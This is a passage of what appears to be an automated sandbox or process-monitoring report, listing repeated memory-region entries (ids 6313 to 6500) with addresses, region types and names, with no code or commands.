"pagefile_0x0000000001e80000" filename = "" Region: id = 6313 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6314 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6315 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6316 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6317 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6318 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6319 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6320 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6321 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6322 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6323 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6324 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6325 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6326 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6327 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6328 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6329 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6330 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6331 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6332 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6333 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6334 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6335 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6336 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6337 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6338 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6339 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6340 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6341 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6342 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6343 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6353 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6354 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6357 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6358 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6361 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6362 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6363 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6366 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6367 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6368 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6369 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6370 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6371 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6372 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6373 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6375 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6376 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6377 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6378 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6379 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6380 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6381 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6382 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6383 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6384 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6385 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6386 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6387 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6388 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6389 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6390 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6392 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6393 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6394 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6400 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6401 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6402 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6403 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6404 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6405 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6406 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6407 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6408 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6409 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6410 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6411 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6412 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6413 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6414 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 6415 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6416 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6417 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6418 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6420 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6421 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6422 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6423 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6424 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6425 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6426 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6427 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 6428 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 6429 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6430 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6431 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 6432 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6433 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6434 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6435 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6436 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6437 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6438 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6439 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6440 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6441 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6442 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6444 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6445 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6448 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6449 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6451 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6452 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6453 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6454 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6455 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6456 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6457 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6458 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6459 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6460 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6461 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6462 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6463 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6464 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6465 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6466 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6467 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6468 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6469 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6470 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6471 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6472 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6473 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6474 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6475 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6476 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6477 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6478 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6479 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6480 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6481 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6482 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6483 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6486 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6487 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6488 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6489 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6490 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6491 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6492 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6493 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6494 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6495 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6496 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6497 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6498 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6499 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 6500 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 